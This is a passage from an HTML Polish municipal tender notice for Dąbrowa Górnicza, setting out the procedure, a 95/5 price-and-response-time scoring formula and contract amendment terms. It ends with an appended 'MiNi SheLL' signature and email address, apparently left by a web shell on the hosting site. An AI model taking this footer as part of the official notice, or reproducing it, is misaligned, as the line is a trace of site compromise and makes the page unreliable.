5. dowód oddania przez Podwykonawcę niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie  polegać na zasobach Podwykonawcy - zgodnie z art. 26 ust. 2b Ustawy: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas przystąpienia do realizacji zlecenia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej umowy w  stosunku do treści  oferty, na podstawie której  dokonano wyboru Wykonawcy, w zakresie:
1.1. zmiany przepisów prawa  w  trakcie realizacji zamówienia   istotnych dla postanowień  zawartej umowy,
1.2. zmiany Personelu Wykonawcy i Zamawiającego  na skutek zdarzeń losowych, zmian kadrowo- personalnych, utraty wymaganych uprawnień, utraty stanowiska  z zastrzeżeniem równoważności uprawnień,
1.3. zmiany podwykonawców  na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem , że nowy podwykonawca  wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca,
1.4. zmiany przepisów prawa  istotnych dla postanowień  zawartej umowy,
1.5. zmiany stawki VAT:
1.5.1. w  przypadku zwiększenia stawki VAT- ceny jednostkowe netto nie mogą być wyższe niż zadeklarowane w kosztorysie ofertowym. Wartość wynagrodzenia brutto nie ulegnie zmianie w okresie obowiązywania umowy,
1.5.2. w przypadku zmniejszenia stawki VAT- ceny jednostkowe netto nie mogą być wyższe niż zadeklarowane w kosztorysie ofertowym. Wartość wynagrodzenia brutto zostanie pomniejszona z odpowiednim zastosowaniem zmniejszonej stawki podatku VAT,
2.  W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa w pkt. 25.4 SIWZ Wykonawca zobowiązany jest do   niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany.   
3.  Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
4.  Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie  strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać  uzasadnienie faktyczne i prawne.
5. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
6.Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 8 do SIWZ -  projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Komunikacji i Drogownictwa, III piętro, pokój nr 317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2015 godzina 08:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej. 2. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% ceny brutto podanej w ofercie. 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
3.1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 niniejszej SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
3.2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch  lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt   9.2. SIWZ przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Dokument wymieniony w  pkt. 9.3.  SIWZ  każdy z Wykonawców składa oddzielnie. 
3.3.Dokumenty i oświadczenia wymienione w  pkt. 9.1.2 do 9.1.5 SIWZ Wykonawcy składają wspólnie przy czym w przypadku polisy wymaganej w pkt. 9.1.5. SIWZ  Zamawiający dopuszcza także przedstawienie 
jednej polisy wystawionej na Wykonawców wspólnie ubiegających się o udzielenie  zamówienia.
Oświadczenie wymienione w pkt. 9.1.1. SIWZ, formularz ofertowy wymieniony w pkt. 9.4.1. SIWZ oraz kosztorys ofertowy wymieniony w pkt. 9.4.2. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców. Oświadczenia na podstawie art. 22 ust. 1 Ustawy (załącznik nr 2 do SIWZ) składają  wszyscy wykonawcy wspólnie na jednym druku lub pełnomocnik.
3.4. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
3.5. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
4. Kryteria oceny ofert
4.1. Złożone oferty, które nie podlegają odrzuceniu, zostaną ocenione zgodnie z następującymi kryteriami: 
4.1.1.	 Cena - Znaczenie procentowe kryterium 95% - Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium - 100  punktów
4.1.2.	Czas przystąpienia do realizacji zlecenia - Znaczenie procentowe kryterium 5% - Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium - 100 punktów

4.2. Sposób punktacji w ramach kryteriów: 
4.2.1. Cena oferty
W  ramach kryterium ceny oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania: Pi (C)= (Cmin/Ci) x 100 pkt ; gdzie:	
Pi (C)	- Ilość punktów jakie otrzyma oferta i za kryterium Cena;
Cmin	- Najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert;
Ci	Cena oferty i.
4.2.2. Czas przystąpienia do realizacji zlecenia
Wykonawca może zadeklarować czas przystąpienia do realizacji zlecenia z przedziału pomiędzy 24 a 72  godzinami z dokładnością do pełnej godziny. Oferta deklarująca najkrótszy czas przystąpienia do realizacji zlecenia, spośród wszystkich ważnych ofert otrzyma 100 pkt.  realizacji spośród wszystkich złożonych i ważnych ofert otrzyma największą ilość punktów tj. 100. Oferty deklarujące dłuższy czas przystąpienia do realizacji zlecenia otrzymają ilość punktów obliczoną na podstawie wzoru: Pi (T)= (Tmin/Ti) x 100 pkt ; gdzie: Pi (T) - Ilość punktów jakie otrzyma oferta i za kryterium Czas przystąpienia do realizacji zlecenia;
Tmin -Najkrótszy zaoferowany czas przystąpienia do realizacji zlecenia;
Ti - Czas przystąpienia do realizacji zlecenia oferty i.
4.3. Całkowita liczba punktów jakie uzyska oferta będzie stanowiła sumę iloczynów ilości punktów jakie oferta uzyskała w danym kryterium i wagi procentowej danego kryterium: P= Pi(C) x 95% + Pi(T) x 5%
4.4. Za ofertę najkorzystniejszą uznana będzie oferta, która uzyska najwyższą całkowitą liczbę punktów. 
4.5.W przypadku uzyskania przez dwie lub więcej ofert jednakowej ilości punktów wygrywa oferta o najniższej spośród nich cenie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com